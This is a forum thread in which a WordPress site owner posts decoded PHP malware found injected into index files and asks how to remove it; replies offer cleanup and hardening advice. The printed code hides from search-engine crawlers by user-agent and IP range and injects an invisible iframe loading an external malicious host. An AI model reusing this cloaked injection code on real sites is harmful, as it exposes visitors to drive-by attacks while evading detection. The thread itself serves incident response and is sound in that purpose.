13 {{ upvoteCount | shortNum }}
13 {{ upvoteCount | shortNum }}

I Need Smart People To Solve This Wordpress Virus Mystery...

by derekmichael02
11 replies
I have several wordpress sites that have caught a virus. This code embeds itself on all the index.php or index.html files in my source code (wordpress, as well as my Rapid Action Profits sales pages).

I've decoded the base64_ and this is what it looks like. Can anyone figure out where it is hiding and how the heck I get rid of it?!?!

Please help!!


error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator', 'slurp','docomo','yandex','mail.ru','alexa.com','p ostrank.com','htmldoc','webcollage','blogpulse.com ','anonymouse.org','12345','httpclient','buzztrack er.com','snoopy','feedtools','arianna.libero.it',' internetseer.com','openacoon.de','rrrrrrrrr','mage nt','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssread er','mybloglog api');
$stop_ips_masks = array(
array("216.239.32.0","216.239.63.255"),
array("64.68.80.0" ,"64.68.87.255" ),
array("66.102.0.0", "66.102.15.255"),
array("64.233.160.0","64.233.191.255"),
array("66.249.64.0", "66.249.95.255"),
array("72.14.192.0", "72.14.255.255"),
array("209.85.128.0","209.85.255.255"),
array("198.108.100.192","198.108.100.207"),
array("173.194.0.0","173.194.255.255"),
array("216.33.229.144","216.33.229.151"),
array("216.33.229.160","216.33.229.167"),
array("209.185.108.128","209.185.108.255"),
array("216.109.75.80","216.109.75.95"),
array("64.68.88.0","64.68.95.255"),
array("64.68.64.64","64.68.64.127"),
array("64.41.221.192","64.41.221.207"),
array("74.125.0.0","74.125.255.255"),
array("65.52.0.0","65.55.255.255"),
array("74.6.0.0","74.6.255.255"),
array("67.195.0.0","67.195.255.255"),
array("72.30.0.0","72.30.255.255"),
array("38.0.0.0","38.255.255.255")
);
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
$first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
echo '<iframe src="http://hdfshtrehsht.co.cc/QQkFBg0MBAEDAAABEkcJBQYNDA0DDQABBg==" width="1" height="1"></iframe>';
}
#mystery #people #smart #solve #virus #wordpress
  • Profile picture of the author AzzamS
    you need to tell us what the virus is doing? need to understand to find a solution
    Signature
    Download 101 Actions for a Complete Website SEO Technical Audit Sample FREE today and charge clients $$$ with it.
    SEO Case Study: 1.7M Visitors from 27,000 Keywords Click here to read the post .
    {{ DiscussionBoard.errors[3476437].message }}
  • Profile picture of the author Joe Motion
    Russian backdoor hidden in your code..
    How to find a backdoor in a hacked WordPress » Otto on WordPress

    You need to reinstall or clean WP..
    http://smackdown.blogsblogsblogs.com...-installation/
    Signature
    Living in SE Asia.. BKK.. PM me for a beer!
    {{ DiscussionBoard.errors[3476446].message }}
  • Profile picture of the author McBob
    To be honest: Once your server has been compromised there's only one way to be sure you are getting rid of everything and that is to wipe and reinstall the server (complete OS etc).

    It's impossible to tell what level of access the attacker gained, whether or not he managed to install and load kernel modules that may or may not be hiding his activity; whether or not he replaced apache, php, perl or other programs with his own modified versions,....
    {{ DiscussionBoard.errors[3476947].message }}
  • Profile picture of the author jasonthewebmaster
    Banned
    Yep, you will most likely not be able to get rid of it unless you wipe everything out and start over.

    Do you have recent backups from before it happened?

    Also, I would look at this for the future:
    Hardening WordPress « WordPress Codex
    (How to secure your wordpress site)
    {{ DiscussionBoard.errors[3476982].message }}
  • Profile picture of the author jasonthewebmaster
    Banned
    I have seen this before.

    It's inserting a 1 pixel by 1 pixel iframe into your site. This allows them to put anything they want in that iframe and load it into your site.

    Look for files that don't belong in your site.

    Typically they are able to insert the encoded string into your index.php file through one of your web forms, using SQL Injection or something like that.


    Also, blacklist those IP addresses and any IP addresses from visitors that you can trace to outside countries that visited your server about the time that they attacked your site. It wont stop them for good, but at least slow them down a bit and give you time to recover.
    {{ DiscussionBoard.errors[3477004].message }}
    • Profile picture of the author kenwarrior
      Originally Posted by jasonthewebmaster View Post


      Also, blacklist those IP addresses and any IP addresses from visitors that you can trace to outside countries that visited your server about the time that they attacked your site. It wont stop them for good, but at least slow them down a bit and give you time to recover.
      Is there any simple way of blocking traffic from certain countries like russia, india, china etc using features available in either the cpanel or wordpress

      It seems like I would not be missing much blocking that traffic, that is where most internet hacks seem to originate from
      {{ DiscussionBoard.errors[3488709].message }}
  • Profile picture of the author kenwarrior
    I had the iframe code problem on a few of my blogs, I was alerted by google webmaster tools - a very useful feature, upgrading to wp3.1 seemed to help, I found that the index.php file had been edited and a line of coded added, I deleted that line, so far I'm now clean, will have to wait a while to see if it lasts

    I did notice that the sites that I'd had a problem with were those using a yahoo answers plugin and were auto bloging some content, not 100% sure if that was a security weak point or not, I've since removed the plugin for other reasons as well as this issue
    {{ DiscussionBoard.errors[3488689].message }}
  • Profile picture of the author iamsuneel
    The first and foremost reason how blogs get hacked is: FTP PROGRAM that we use.

    Now, don't shout at me because let me complete.

    As we access several websites there is a good chance of a trojan silently entering into our system. This might be a simple worm which passes the typed words through keyloggers, but it is potentially dangerous when sensitive information is accessed.

    We normally use FTP programs to modify or upload some content online and as a matter of time saving, we select 'Save Password' option so that we do not have to type the password again and again. This saved password is normally what these trojans keep a tab on.

    I faced the same problem a few months back and came across an article which stated the above reason.

    I used WP Scanner plugin to check and delete the malicious code.
    {{ DiscussionBoard.errors[3488939].message }}
    • Profile picture of the author kenwarrior
      Originally Posted by iamsuneel View Post


      I used WP Scanner plugin to check and delete the malicious code.
      Could you post the exact plugin that you use, there seems to be serveral out there with similar names

      thanks
      {{ DiscussionBoard.errors[3489065].message }}
      • Profile picture of the author Adam H
        IamSuneel is correct , the most likely cause of infection is via your own FTP another cause could be a poorly coded theme, if all the sites are wordpress its a pretty simple fix but time consuming.

        Delete all files on the server , this means you need to download and upload fresh versions of wordpress, themes and plugins making sure your config files are entered back correctly do that no data is lost.

        Before reupoading fresh files you will need to change passwords on everything, wordpress admin, FTP , cpanel etc etc etc .

        Once you have everything reuploaded and running i highly recommend setting theme files to file permissions of 644 so that themes can not be edited via the wordpress admin panel or "some" 3rd party backdoor scripts.

        The likelyhood is that there are files left on your server currently which will continue to allow these people in to your server so unless you delete all files and reupload fresh ones its likely to happen again and again.

        When this happened to me a couple of years ago i actually changed cpanel/FTP passwords everytime i logged in to the server , because one of the files which was hidden on the server was sending out the FTP login every time i entered FTP , clever stuff but incredibly annoying. At the time i couldnt wipe the server because of certain reasons but as soon as i got the go ahead it was done and no problems after that point.

        Good luck, could be a very long frustrating trip for you.
        {{ DiscussionBoard.errors[3489464].message }}
        • Profile picture of the author kernelpaniker
          If you aren't running your own server then you are most likely on a shared server. The "hacker" probably got in via one of the other accounts on the server. Then he/she injected code to (probably) all .php files.

          Remove the injected code and you will probably be fine until it happens again.
          {{ DiscussionBoard.errors[3489654].message }}

Trending Topics